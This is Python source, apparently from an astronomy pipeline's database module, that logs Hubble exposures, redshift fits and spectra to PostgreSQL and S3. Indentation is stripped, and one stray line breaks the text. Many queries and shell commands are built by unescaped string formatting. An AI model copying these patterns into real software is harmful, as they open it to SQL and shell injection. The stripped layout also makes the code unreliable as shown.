df0 = df0.append(df)
if len(df0) > SKIP:
# Send to DB and reset append table
print('>>> to DB >>> ({0}, {1})'.format(i, len(df0)))
df0.to_sql('exposure_log', engine, index=False, if_exists='append', method='multi')
df0 = df[:0]
def update_all_exposure_log():
"""
Run all
"""
import glob
import numpy as np
from grizli.aws import db
from importlib import reload
reload(db)
config = db.get_connection_info(config_file='/home/ec2-user/db_readonly.yml')
engine = db.get_db_engine(config=config)
# DASH
#_files = db.from_sql("SELECT file from exposure_log WHERE mdrizsky is null AND file like 'icxe%%'", engine)
# COSMOS F160W
_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND awspath like 'grizli-cosmos%%' AND filter like 'f160w'", engine)
# COSMOS F814W
#_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6 AND filter like 'f814w'", engine)
#_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6", engine)
### COSMOS grism
#_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6 AND filter like 'g1%%'", engine)
### All grism
#_files = db.from_sql("SELECT file, filter, awspath, mdrizsky from exposure_log WHERE mdrizsky is null AND filter like 'g1%%'", engine)
#db.update_exposure_log({'file':_files['file'][0], 'engine':engine, 'skip':False}, {})
# All IR
# _files = db.from_sql("SELECT file, filter from exposure_log WHERE mdrizsky is null AND filter like 'f0%%'", engine)
#
_files = db.from_sql("SELECT file, filter, parent from exposure_log WHERE mdrizsky is null AND filter like 'f%%'", engine)
_files = db.from_sql("SELECT file, filter, parent, product from exposure_log WHERE mdrizsky is null AND gsky101 is null", engine)
# Skip 3DHST
keep = _files['parent'] != 'xx'
for p in ['j123656p6215','j141952p5255','j033236m2748','j021740m0512']:
keep &= _files['parent'] != p
#_files = db.from_sql("SELECT file, filter from exposure_log WHERE mdrizsky is null AND awspath like 'grizli-cosmos%%' AND filter like 'f814w' LIMIT 10", engine)
# latest cosmos
_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND awspath like 'cosmos-dash%%' AND filter like 'f160w'", engine)
N = len(_files)
idx = np.argsort(np.random.normal(size=N))
for i, file in enumerate(_files['file'][idx]):
print(f'\n {i+1} / {N}\n')
_ = glob.glob(f'{file}*')
if len(_) == 0:
db.update_exposure_log({'file':file, 'engine':engine}, {})
def update_exposure_log(event, context):
"""
Get exposure info from FITS file and put in database
Recognized `event` keywords (default):
'file' : file rootname in exposure_log, *required*
'keywords' : list of keywords to take from the Primary header
(['EXPFLAG','EXPTIME','EXPSTART','SUNANGLE'])
'dump_dq' : generate a compact DQ file and upload to S3 (True)
'remove': Remove the downloaded exposure file (True)
'skip': Don't do anything if 'mdrizsky' populated in database
"""
import os
import boto3
import astropy.io.fits as pyfits
from grizli import utils
if 'file' not in event:
print("'file' keyword not found in `event`")
return False
if 'keywords' in event:
keywords = event['keywords']
else:
keywords = ['EXPFLAG','EXPTIME','EXPSTART','SUNANGLE']
keywords += ['GSKY101', 'GSKY102', 'GSKY103', 'PERSNPIX', 'PERSLEVL']
kwvals = {}
if 'engine' in event:
engine = event['engine']
else:
engine = get_db_engine(echo=False)
_q = from_sql("SELECT * from exposure_log where file LIKE '{0}'".format(event['file']), engine)
if len(_q) == 0:
print('File {0} not found in `exposure_log`'.format(event['file']))
return False
if 'skip' in event:
skip = event['skip']
else:
skip = True
if (not hasattr(_q['mdrizsky'], 'mask')) & skip:
print('Info for {0} found in `exposure_log`'.format(event['file']))
return True
#
local_file = '{0}_{1}.fits'.format(_q['file'][0], _q['extension'][0])
s3 = boto3.resource('s3')
bucket = _q['awspath'][0].split('/')[0]
bkt = s3.Bucket(bucket)
awsfile = '/'.join(_q['awspath'][0].split('/')[1:]).strip('/')
awsfile += '/'+local_file
print(f'{bucket}:{awsfile} > {local_file}')
if not os.path.exists(local_file):
try:
bkt.download_file(awsfile, local_file,
ExtraArgs={"RequestPayer": "requester"})
except:
print(f'Failed to download s3://{bucket}/{awsfile}')
# Try other bucket path
if 'Exposures' in awsfile:
bucket = 'grizli-v1'
bkt = s3.Bucket(bucket)
awsfile = 'Pipeline/{0}/Prep/'.format(_q['parent'][0])
awsfile += local_file
try:
bkt.download_file(awsfile, local_file,
ExtraArgs={"RequestPayer": "requester"})
except:
print(f'Failed to download s3://{bucket}/{awsfile}')
return False
kwvals['awspath'] = f'{bucket}/{os.path.dirname(awsfile)}'
else:
return False
######### Update exposure_log table
im = pyfits.open(local_file)
kwvals['ndq'] = (im['DQ',1].data == 0).sum()
if 'MDRIZSKY' in im['SCI',1].header:
kwvals['mdrizsky'] = im['SCI',1].header['MDRIZSKY']
for k in keywords:
if (k in im[0].header) & (k.lower() in _q.colnames):
kwvals[k.lower()] = im[0].header[k]
set_keys = []
for k in kwvals:
if isinstance(kwvals[k], str):
_set = 'x = \'{x}\''
else:
_set = 'x = {x}'
set_keys.append(_set.replace('x', k))
sqlstr = ('UPDATE exposure_log SET ' + ', '.join(set_keys) +
" WHERE file LIKE '{0}'".format(event['file']))
print(sqlstr.format(**kwvals))
engine.execute(sqlstr.format(**kwvals))
im.close()
######### Compact DQ file
if 'dump_dq' in event:
dump_dq = event['dump_dq']
else:
dump_dq = True
if dump_dq:
utils.dump_flt_dq(local_file)
repl = ('.fits', '.dq.fits.gz')
print(f'{local_file} > {bucket}:{awsfile}'.replace(*repl))
try:
bkt.upload_file(local_file.replace(*repl),
awsfile.replace(*repl),
ExtraArgs={'ACL':'public-read'})
except:
print(f'Failed to upload s3://{bucket}:{awsfile}'.replace(*repl))
remove = True
if 'remove' in event:
remove = event['remove']
if remove:
print('Remove '+local_file)
if os.path.exists(local_file):
os.remove(local_file)
if dump_dq:
print('Remove '+local_file.replace(*repl))
if os.path.exists(local_file.replace(*repl)):
os.remove(local_file.replace(*repl))
return kwvals
def run_shrink_ramps():
from grizli.aws import db
_q = db.from_sql("select file, awspath, parent from exposure_log where extension LIKE 'flt' AND parent LIKE 'j002836m3311' limit 5", engine)
for i, (file, awspath, parent) in enumerate(zip(_q['file'], _q['awspath'], _q['parent'])):
shrink_ramp_file(file, awspath, parent, engine=engine, MAX_SIZE=2*1024**2, convert_args='-scale 35% -quality 90', remove=True)
def shrink_ramp_file(file, awspath, parent, engine=None, MAX_SIZE=2*1024**2, convert_args='-scale 35% -quality 90', remove=True):
"""
Make ramp.png files smaller with ImageMagick
"""
import os
import subprocess
import shutil
import boto3
import astropy.io.fits as pyfits
from grizli import utils
if engine is None:
engine = get_db_engine(echo=False)
local_file = '{0}_ramp.png'.format(file)
s3 = boto3.resource('s3')
bucket = awspath.split('/')[0]
bkt = s3.Bucket(bucket)
awsfile = '/'.join(awspath.split('/')[1:])
awsfile += '/'+local_file
awsfile = awsfile.replace('/Prep','/RAW')
print(f'{bucket}/{awsfile} > {local_file}')
if not os.path.exists(local_file):
try:
bkt.download_file(awsfile, local_file,
ExtraArgs={"RequestPayer": "requester"})
except:
print(f'Failed to download s3://{bucket}/{awsfile}')
# Try other bucket path
if 'Exposures' in awsfile:
bucket = 'grizli-v1'
bkt = s3.Bucket(bucket)
awsfile = 'Pipeline/{0}/RAW/'.format(parent)
awsfile += local_file
try:
bkt.download_file(awsfile, local_file,
ExtraArgs={"RequestPayer": "requester"})
except:
print(f'Failed to download s3://{bucket}/{awsfile}')
return False
else:
return False
print(f'{local_file:>25} {os.stat(local_file).st_size/1024**2:.2f}')
bw_file = local_file.replace('.png', '.sm.png')
if os.stat(local_file).st_size > MAX_SIZE:
subprocess.call(f"convert {convert_args} {local_file} {bw_file}",
shell=True)
print(f'{bw_file:>25} {os.stat(bw_file).st_size/1024**2:.2f}')
try:
bkt.upload_file(bw_file, awsfile, ExtraArgs={'ACL':'public-read'})
except:
print(f'Failed to upload s3://{bucket}/{awsfile}')
else:
print('skip')
if remove:
print('Remove '+local_file)
if os.path.exists(local_file):
os.remove(local_file)
if os.path.exists(bw_file):
os.remove(bw_file)
def get_exposures_at_position(ra, dec, engine, dr=10):
cosdec = np.cos(dec/180*np.pi)
res = from_sql('select * from exposure_log where (ABS(ra - {0}) < {1}) AND (ABS(dec-{2}) < {3})'.format(ra, dr/cosdec, dec, dr), engine)
return res
def add_irac_table():
from scipy.spatial import ConvexHull
os.chdir('/Users/gbrammer/Research/HST/CHArGE/FieldsSummary')
files = glob.glob('*ipac.fits')
files.sort()
bands = ['IRAC 3.6um', 'IRAC 4.5um', 'IRAC 5.8um', 'IRAC 8.0um', 'MIPS 24um']
bkey = {}
for b in bands:
key = b.replace(' ', '').replace('.', '')[:-2].lower()
bkey[key] = b
N = 0
data = {'field_root': []}
aor_data = {'field_root': [], 'reqkey': []}
for k in bkey:
data['exp_'+k] = []
data['n_'+k] = []
data['fp_'+k] = []
for i, file in enumerate(files):
tab = utils.read_catalog(file)
field = file.split('_ipac')[0]
if 'x' in tab.colnames:
data['field_root'].append(field)
for k in bkey:
data['exp_'+k].append(0)
data['n_'+k].append(0)
data['fp_'+k].append([])
continue
N += len(tab)
print(i, file, N)
data['field_root'].append(field)
for k in bkey:
sel = tab['with_hst'] & (tab['wavelength'] == bkey[k])
data['exp_'+k].append(tab['exposuretime'][sel].sum()/3600)
data['n_'+k].append(sel.sum())
if sel.sum() == 0:
data['fp_'+k].append([])
continue
r, d = [], []
for j in range(4):
r.extend(tab['ra{0}'.format(j+1)][sel].data)
d.extend(tab['dec{0}'.format(j+1)][sel].data)
pts = np.array([r, d]).T
vert = ConvexHull(pts).vertices
fp = pts[vert, :]
data['fp_'+k].append(fp.T.tolist())
aors = np.unique(tab['reqkey'])
aor_data['field_root'].extend([field]*len(aors))
aor_data['reqkey'].extend(list(aors))
#
import pandas as pd
df = pd.DataFrame(aor_data)
df.to_sql('spitzer_aors', engine, index=False, if_exists='append', method='multi')
df = pd.DataFrame(data)
# First row to initialize table
first = df[0:1]
for k in bkey:
first.pop('fp_'+k)
engine.execute('drop table spitzer_log;')
first.to_sql('spitzer_log', engine, index=False, if_exists='append', method='multi')
for k in bkey:
cmd = 'alter table spitzer_log add column fp_{0} float [];'.format(k)
engine.execute(cmd)
engine.execute('delete from spitzer_log where True;')
df.to_sql('spitzer_log', engine, index=False, if_exists='append', method='multi')
def show_all_fields():
from grizli.aws import db as grizli_db
import matplotlib.pyplot as plt
plt.ioff()
res = pd.read_sql_query("select distinct root from redshift_fit order by root;", engine)
roots = res['root'].tolist()
for root in roots:
print('\n\n', root, '\n\n')
if os.path.exists('{0}_zhist.png'.format(root)):
continue
try:
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'dlinesn', 'q_z'], where="AND status > 4 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
except:
continue
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png s3://grizli-v1/tables/'.format(root))
use user path
"""
Interact with the grizli AWS database
"""
import os
import glob
import numpy as np
try:
import pandas as pd
except:
pd = None
from .. import utils
FLAGS = {'init_lambda': 1,
'start_beams': 2,
'done_beams': 3,
'no_run_fit': 4,
'start_redshift_fit': 5,
'fit_complete': 6}
COLUMNS = ['root', 'id', 'status', 'ra', 'dec', 'ninput', 'redshift', 'as_epsf', 't_g102', 'n_g102', 'p_g102', 't_g141', 'n_g141', 'p_g141', 't_g800l', 'n_g800l', 'p_g800l', 'numlines', 'haslines', 'chi2poly', 'chi2spl', 'splf01', 'sple01', 'splf02', 'sple02', 'splf03', 'sple03', 'splf04', 'sple04', 'huberdel', 'st_df', 'st_loc', 'st_scl', 'dof', 'chimin', 'chimax', 'bic_poly', 'bic_spl', 'bic_temp', 'z02', 'z16', 'z50', 'z84', 'z97', 'zwidth1', 'zwidth2', 'z_map', 'zrmin', 'zrmax', 'z_risk', 'min_risk', 'd4000', 'd4000_e', 'dn4000', 'dn4000_e', 'dlineid', 'dlinesn', 'flux_pab', 'err_pab', 'ew50_pab', 'ewhw_pab', 'flux_hei_1083', 'err_hei_1083', 'ew50_hei_1083', 'ewhw_hei_1083', 'flux_siii', 'err_siii', 'ew50_siii', 'ewhw_siii', 'flux_oii_7325', 'err_oii_7325', 'ew50_oii_7325', 'ewhw_oii_7325', 'flux_ariii_7138', 'err_ariii_7138', 'ew50_ariii_7138', 'ewhw_ariii_7138', 'flux_sii', 'err_sii', 'ew50_sii', 'ewhw_sii', 'flux_ha', 'err_ha', 'ew50_ha', 'ewhw_ha', 'flux_oi_6302', 'err_oi_6302', 'ew50_oi_6302', 'ewhw_oi_6302', 'flux_hei_5877', 'err_hei_5877', 'ew50_hei_5877', 'ewhw_hei_5877', 'flux_oiii', 'err_oiii', 'ew50_oiii', 'ewhw_oiii', 'flux_hb', 'err_hb', 'ew50_hb', 'ewhw_hb', 'flux_oiii_4363', 'err_oiii_4363', 'ew50_oiii_4363', 'ewhw_oiii_4363', 'flux_hg', 'err_hg', 'ew50_hg', 'ewhw_hg', 'flux_hd', 'err_hd', 'ew50_hd', 'ewhw_hd', 'flux_h7', 'err_h7', 'ew50_h7', 'ewhw_h7', 'flux_h8', 'err_h8', 'ew50_h8', 'ewhw_h8', 'flux_h9', 'err_h9', 'ew50_h9', 'ewhw_h9', 'flux_h10', 'err_h10', 'ew50_h10', 'ewhw_h10', 'flux_neiii_3867', 'err_neiii_3867', 'ew50_neiii_3867', 'ewhw_neiii_3867', 'flux_oii', 'err_oii', 'ew50_oii', 'ewhw_oii', 'flux_nevi_3426', 'err_nevi_3426', 'ew50_nevi_3426', 'ewhw_nevi_3426', 'flux_nev_3346', 'err_nev_3346', 'ew50_nev_3346', 'ewhw_nev_3346', 'flux_mgii', 'err_mgii', 'ew50_mgii', 'ewhw_mgii', 'flux_civ_1549', 'err_civ_1549', 'ew50_civ_1549', 'ewhw_civ_1549', 'flux_ciii_1908', 'err_ciii_1908', 'ew50_ciii_1908', 'ewhw_ciii_1908', 'flux_oiii_1663', 'err_oiii_1663', 'ew50_oiii_1663', 'ewhw_oiii_1663', 'flux_heii_1640', 'err_heii_1640', 'ew50_heii_1640', 'ewhw_heii_1640', 'flux_niii_1750', 'err_niii_1750', 'ew50_niii_1750', 'ewhw_niii_1750', 'flux_niv_1487', 'err_niv_1487', 'ew50_niv_1487', 'ewhw_niv_1487', 'flux_nv_1240', 'err_nv_1240', 'ew50_nv_1240', 'ewhw_nv_1240', 'flux_lya', 'err_lya', 'ew50_lya', 'ewhw_lya', 'pdf_max', 'cdf_z', 'sn_pab', 'sn_hei_1083', 'sn_siii', 'sn_oii_7325', 'sn_ariii_7138', 'sn_sii', 'sn_ha', 'sn_oi_6302', 'sn_hei_5877', 'sn_oiii', 'sn_hb', 'sn_oiii_4363', 'sn_hg', 'sn_hd', 'sn_h7', 'sn_h8', 'sn_h9', 'sn_h10', 'sn_neiii_3867', 'sn_oii', 'sn_nevi_3426', 'sn_nev_3346', 'sn_mgii', 'sn_civ_1549', 'sn_ciii_1908', 'sn_oiii_1663', 'sn_heii_1640', 'sn_niii_1750', 'sn_niv_1487', 'sn_nv_1240', 'sn_lya', 'chinu', 'bic_diff', 'log_risk', 'log_pdf_max', 'zq', 'mtime', 'vel_bl', 'vel_nl', 'vel_z', 'vel_nfev', 'vel_flag', 'grizli_version']
engine = None
def get_connection_info(config_file=None):
"""
Read the database connection info
"""
import yaml
if config_file is None:
config_file = os.path.join(os.path.dirname(__file__),
'../data/db.yml')
try:
local_file = os.path.join(os.getenv('HOME'), 'db.local.yml')
if os.path.exists(local_file):
# print('Use ~/db.local.yml')
config_file = local_file
except:
pass
fp = open(config_file)
try:
db_info = yaml.load(fp, Loader=yaml.FullLoader)
except:
db_info = yaml.load(fp)
fp.close()
return db_info
def get_db_engine(config=None, echo=False):
"""
Generate an SQLAlchemy engine for the grizli database
"""
from sqlalchemy import create_engine
import sqlalchemy.pool as pool
import psycopg2
import boto3
# With IAM auth on EC2
iam_file = '/home/ec2-user/db.iam.yaml'
if os.path.exists(iam_file):
config = get_connection_info(config_file=iam_file)
session = boto3.Session()
client = session.client('rds', region_name=config['region'])
token = client.generate_db_auth_token(DBHostname=config['hostname'],
Port=config['port'],
DBUsername=config['username'],
Region=config['region'])
# conn = psycopg2.connect(host=config['hostname'],
# port=config['port'],
# database=config['database'],
# user=config['username'],
# password=token,
# sslrootcert="SSLCERTIFICATE")
#
# engine = create_engine('postgresql+psycopg2://', creator=POOL.getconn)
connect_args = dict(host=config['hostname'],
port=config['port'],
database=config['database'],
user=config['username'],
password=token,
sslrootcert="SSLCERTIFICATE")
engine = create_engine('postgresql+psycopg2://',
connect_args=connect_args)
return engine
if config is None:
config = get_connection_info()
db_string = "postgresql://{0}:{1}@{2}:{3}/{4}"
db_string = db_string.format(config['username'], config['password'],
config['hostname'], config['port'],
config['database'])
engine = create_engine(db_string, echo=echo)
return engine
def get_redshift_fit_status(root, id, table='redshift_fit', engine=None):
"""
Get status value from the database for root_id object
"""
import pandas as pd
if engine is None:
engine = get_db_engine(echo=False)
res = pd.read_sql_query("SELECT status FROM {2} WHERE (root = '{0}' AND id = {1})".format(root, id, table), engine)
if len(res) == 0:
return -1
else:
return res['status'][0]
def update_jname():
from grizli import utils
from grizli.aws import db as grizli_db
res = grizli_db.from_sql("select p_root, p_id, p_ra, p_dec from photometry_apcorr", engine)
jn = [utils.radec_to_targname(ra=ra, dec=dec, round_arcsec=(0.001, 0.001), precision=2, targstr='j{rah}{ram}{ras}.{rass}{sign}{ded}{dem}{des}.{dess}') for ra, dec in zip(res['p_ra'], res['p_dec'])]
for c in res.colnames:
res.rename_column(c, c.replace('p_', 'j_'))
zres = grizli_db.from_sql("select root, phot_root, id, ra, dec, z_map,"
"q_z, t_g800l, t_g102, t_g141, status from "
"redshift_fit where ra is not null and "
"status > 5", engine)
# Find duplicates
from scipy.spatial import cKDTree
data = np.array([zres['ra'], zres['dec']]).T
ok = zres['q_z'].filled(-100) > -0.7
tree = cKDTree(data[ok])
dr, ix = tree.query(data[ok], k=2)
cosd = np.cos(data[:, 1]/180*np.pi)
dup = (dr[:, 1] < 0.01/3600) # & (zres['phot_root'][ix[:,0]] != zres['phot_root'][ix[:,1]])
ix0 = ix[:, 0]
ix1 = ix[:, 1]
dup = (dr[:, 1] < 0.01/3600)
dup &= (zres['phot_root'][ok][ix0] == zres['phot_root'][ok][ix1])
dup &= (zres['id'][ok][ix0] == zres['id'][ok][ix1])
# second is G800L
dup &= zres['t_g800l'].filled(0)[ok][ix1] > 10
# plt.scatter(zres['z_map'][ok][ix0[dup]], zres['z_map'][ok][ix1[dup]],
# marker='.', alpha=0.1)
def update_redshift_fit_status(root, id, status=0, table='redshift_fit', engine=None, verbose=True):
"""
Set the status flag in the table
"""
import time
import pandas as pd
from astropy.table import Table
from astropy.time import Time
NOW = Time.now().iso
if engine is None:
engine = get_db_engine(echo=False)
old_status = get_redshift_fit_status(root, id, table=table, engine=engine)
if old_status < 0:
# Need to add an empty row
tab = Table()
tab['root'] = [root]
tab['id'] = [id]
tab['status'] = [status]
tab['mtime'] = [NOW]
row_df = tab.to_pandas()
add_redshift_fit_row(row_df, engine=engine, table=table,
verbose=verbose)
else:
sqlstr = """UPDATE {0}
SET status = {1}, mtime = '{2}'
WHERE (root = '{3}' AND id = {4});
""".format(table, status, NOW, root, id)
if verbose:
msg = 'Update status for {0} {1}: {2} -> {3} on `{4}` ({5})'
print(msg.format(root, id, old_status, status, table, NOW))
if hasattr(engine, 'cursor'):
with engine.cursor() as cur:
cur.execute(sqlstr)
else:
engine.execute(sqlstr)
def execute_helper(sqlstr, engine):
"""
Different behaviour for psycopg2.connection and sqlalchemy.engine
"""
if hasattr(engine, 'cursor'):
with engine.cursor() as cur:
cur.execute(sqlstr)
else:
engine.execute(sqlstr)
def get_row_data(rowfile='gds-g800l-j033236m2748_21181.row.fits', status_flag=FLAGS['fit_complete']):
"""
Convert table from a row file to a pandas DataFrame
"""
import pandas as pd
from astropy.table import Table
from astropy.time import Time
NOW = Time.now().iso
if isinstance(rowfile, str):
if rowfile.endswith('.fits'):
tab = Table.read(rowfile, character_as_bytes=False)
allowed_columns = COLUMNS
else:
# Output of stellar fits
tab = Table.read(rowfile, format='ascii.commented_header')
tab['chinu'] = tab['chi2']/tab['dof']
tab['phot_root'] = tab['root']
tab.rename_column('best_template', 'stellar_template')
try:
tab['chinu'] = tab['chi2']/tab['dof']
tab['phot_root'] = tab['root']
# BIC of spline-only and template fits
bic_spl = np.log(tab['dof'])*(tab['nk']-1) + tab['chi2_flat']
bic_star = np.log(tab['dof'])*(tab['nk']) + tab['chi2']
tab['bic_diff_star'] = bic_spl - bic_star
except:
print('Parse {0} failed'.format(rowfile))
pass
allowed_columns = ['root', 'id', 'ra', 'dec', 'chi2', 'nk', 'dof',
'chinu', 'chi2_flat', 'bic_diff_star', 'mtime',
'stellar_template', 'status', 'phot_root',
'as_epsf']
else:
tab = rowfile
if 'cdf_z' in tab.colnames:
cdf_z = tab['cdf_z'].data
tab.remove_column('cdf_z')
else:
cdf_z = None
tab['mtime'] = NOW
tab['status'] = status_flag
remove_cols = []
for c in tab.colnames:
if '-' in c:
tab.rename_column(c, c.replace('-', '_'))
for c in tab.colnames:
tab.rename_column(c, c.lower())
# Remove columns not in the database
remove_cols = []
for c in tab.colnames:
if c not in allowed_columns:
#print('Remove column: ', c)
remove_cols.append(c)
if len(remove_cols) > 0:
tab.remove_columns(remove_cols)
row_df = tab.to_pandas()
if cdf_z is not None:
row_df['cdf_z'] = cdf_z.tolist()
return row_df
def delete_redshift_fit_row(root, id, table='redshift_fit', engine=None):
"""
Delete a row from the redshift fit table
"""
if engine is None:
engine = get_db_engine(echo=False)
res = engine.execute("DELETE from {2} WHERE (root = '{0}' AND id = {1})".format(root, id, table))
def add_redshift_fit_row(row_df, table='redshift_fit', engine=None, verbose=True):
"""
Update the row in the redshift_fit table
"""
if engine is None:
engine = get_db_engine(echo=False)
if isinstance(row_df, str):
row_df = get_row_data(row_df)
if ('root' not in row_df.columns) | ('id' not in row_df.columns):
print('Need at least "root" and "id" columns in the row data')
return False
root = row_df['root'][0]
id = row_df['id'][0]
status = get_redshift_fit_status(root, id, table=table, engine=engine)
# Delete the old row?
if status >= 0:
print('Delete and update row for {0}/{1} on `{2}`'.format(root, id,
table))
delete_redshift_fit_row(root, id, table=table, engine=engine)
else:
print('Add row for {0}/{1} on `{2}`'.format(root, id, table))
# Add the new data
row_df.to_sql(table, engine, index=False, if_exists='append', method='multi')
###########
def add_missing_rows(root='j004404m2034', engine=None):
"""
Add rows that were completed but that aren't in the table
"""
import glob
from astropy.table import vstack, Table
import pandas as pd
from grizli.aws import db as grizli_db
if engine is None:
engine = grizli_db.get_db_engine(echo=False)
os.system('aws s3 sync s3://grizli-v1/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*row.fits"'.format(root))
row_files = glob.glob('{0}*row.fits'.format(root))
row_files.sort()
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE root = '{0}' AND status=6".format(root), engine)
res_ids = res['id'].to_list()
tabs = []
print('\n\n NROWS={0}, NRES={1}\n\n'.format(len(row_files), len(res)))
for row_file in row_files:
id_i = int(row_file.split('.row.fits')[0][-5:])
if id_i not in res_ids:
grizli_db.add_redshift_fit_row(row_file, engine=engine, verbose=True)
def convert_1D_to_lists(file='j234420m4245_00615.1D.fits'):
"""
Convert 1D spectral data to lists suitable for putting into dataframes
and sending to the databases.
"""
from collections import OrderedDict
import astropy.io.fits as pyfits
from .. import utils
if not os.path.exists(file):
print('Spectrum file not found')
return False
im = pyfits.open(file)
obj_id = im[0].header['ID']
obj_root = im[0].header['TARGET']
if '.R30.' in file:
skip_columns = ['line', 'cont']
pref = 'spec1d_r30'
else:
skip_columns = []
pref = 'spec1d'
spectra = OrderedDict()
has_spectra = False
for gr in ['G102', 'G141', 'G800L']:
if gr in im:
has_spectra = True
sp = utils.GTable.read(file, hdu=gr)
prefix = '{0}_{1}_'.format(pref, gr.lower())
spd = {prefix+'id': obj_id, prefix+'root': obj_root}
for c in sp.colnames:
if c in skip_columns:
continue
spd[prefix+c] = sp[c].tolist()
spectra[gr.lower()] = spd
if has_spectra:
return spectra
else:
return False
def send_1D_to_database(files=[], engine=None):
"""
Send a list of 1D spectra to the spectra databases
ToDo: check for existing lines
"""
from collections import OrderedDict
import pandas as pd
if engine is None:
engine = get_db_engine()
tables = OrderedDict()
for file in files:
sp_i = convert_1D_to_lists(file=file)
print('Read spec1d file: {0}'.format(file))
for gr in sp_i:
# Initialize the columns
if gr not in tables:
tables[gr] = OrderedDict()
for c in sp_i[gr]:
tables[gr][c] = []
# Add the data
for c in sp_i[gr]:
tables[gr][c].append(sp_i[gr][c])
prefix = 'spec1d_r30' if '.R30.' in files[0] else 'spec1d'
for gr in tables:
tablename = '{0}_{1}'.format(prefix, gr)
df = pd.DataFrame(tables[gr])
# Put wavelengths in their own tables to avoid massive duplication
wave_table = tablename+'_wave'
if wave_table not in engine.table_names():
print('Create wave table: '+wave_table)
wdf = pd.DataFrame(data=tables[gr][wave_table][0],
columns=[wave_table])
wdf.to_sql(wave_table, engine, if_exists='replace',
index=True, index_label=tablename+'_idx')
# drop wave from spectra tables
df.drop('{0}_wave'.format(tablename), axis=1, inplace=True)
# Create table
if tablename not in engine.table_names():
print('Initialize table {0}'.format(tablename))
SQL = "CREATE TABLE {0} (\n".format(tablename)
SQL += ' {0}_root text,\n'.format(tablename)
SQL += ' {0}_id integer,\n'.format(tablename)
for c in df.columns:
item = df[c][0]
if isinstance(item, list):
SQL += ' {0} real[{1}],\n'.format(c, len(item))
engine.execute(SQL[:-2]+')')
try:
engine.execute("CREATE INDEX {0}_idx ON {0} ({0}_root, {0}_id);".format(tablename))
except:
pass
# Delete existing duplicates
if tablename in engine.table_names():
SQL = """DELETE from {0} WHERE """.format(tablename)
mat = ["({0}_root = '{1}' AND {0}_id = {2})".format(tablename, r, i) for r, i in zip(df[tablename+'_root'], df[tablename+'_id'])]
SQL += 'OR '.join(mat)
rsp = engine.execute(SQL)
# Send the table
print('Send {0} rows to {1}'.format(len(df), tablename))
df.to_sql(tablename, engine, index=False, if_exists='append',
method='multi')
def add_all_spectra():
from grizli.aws import db as grizli_db
roots = grizli_db.from_sql("select root,count(root) as n from redshift_fit group BY root order by n DESC", engine)
o = 1
for root in roots['root'][::o]:
existing = open('log').readlines()
if root+'\n' in existing:
print('Skip', root)
continue
fp = open('log', 'a')
fp.write(root+'\n')
fp.close()
try:
grizli_db.add_oned_spectra(root=root, engine=engine)
except:
pass
def add_oned_spectra(root='j214224m4420gr01', bucket='grizli-v1', engine=None):
import os
import glob
from collections import OrderedDict
if engine is None:
engine = get_db_engine()
# import boto3
# s3 = boto3.resource('s3')
# bkt = s3.Bucket(bucket)
#
# files = [obj.key for obj in bkt.objects.filter(Prefix='Pipeline/{0}/Extractions/'.format(root))]
#
# for file in files:
# if (('.R30.fits' in file) | ('.1D.fits' in file)) & (not os.path.exists(file)):
# local_file = os.path.basename(file)
# print(local_file)
# bkt.download_file(file, local_file,
# ExtraArgs={"RequestPayer": "requester"})
os.system('aws s3 sync s3://{0}/Pipeline/{1}/Extractions/ ./ --exclude "*" --include "*R30.fits" --include "*1D.fits"'.format(bucket, root))
nmax = 500
# 1D.fits
files = glob.glob('{0}_*1D.fits'.format(root))
files.sort()
for i in range(len(files)//nmax+1):
send_1D_to_database(files=files[i*nmax:(i+1)*nmax], engine=engine)
files = glob.glob('{0}_*R30.fits'.format(root))
files.sort()
for i in range(len(files)//nmax+1):
send_1D_to_database(files=files[i*nmax:(i+1)*nmax], engine=engine)
os.system('rm {0}_*.1D.fits {0}_*.R30.fits'.format(root))
if False:
import scipy.ndimage as nd
import matplotlib.pyplot as plt
tablename = 'spec1d_g141'
#tablename = 'spec1d_g102'
#tablename = 'spec1d_r30_g141'
if 1:
# by root
resp = pd.read_sql_query("SELECT root, id, z_map, q_z, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND root = '{0}' AND q_z > -0.7 ORDER BY z_map".format(root, tablename), engine)
else:
# everything
resp = pd.read_sql_query("SELECT root, id, z_map, q_z, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.7 ORDER BY z_map".format(root, tablename), engine)
# Halpha EW
resp = pd.read_sql_query("SELECT root, id, z_map, q_z, ew50_ha, flux_ha, err_ha, t_g141, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.3 AND err_ha > 0 ORDER BY ew50_ha".format(root, tablename), engine)
# Everything
fresp = pd.read_sql_query("SELECT root, id, z_map, q_z, ew50_ha, flux_ha, err_ha, ew50_oiii, ew50_hb, ew50_oii, d4000, d4000_e, t_g141, t_g102, t_g800l, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.7 AND chinu < 2 ORDER BY z_map".format(root, tablename), engine)
wave = pd.read_sql_query("SELECT * from {0}_wave".format(tablename),
engine)[tablename+'_wave'].values
resp = fresp
sort_column = 'z_map'
bin_factor = 1
wnorm = 6400
zref = 1.3e4/wnorm-1
sel = np.isfinite(fresp[sort_column]) & (fresp[sort_column] != -99)
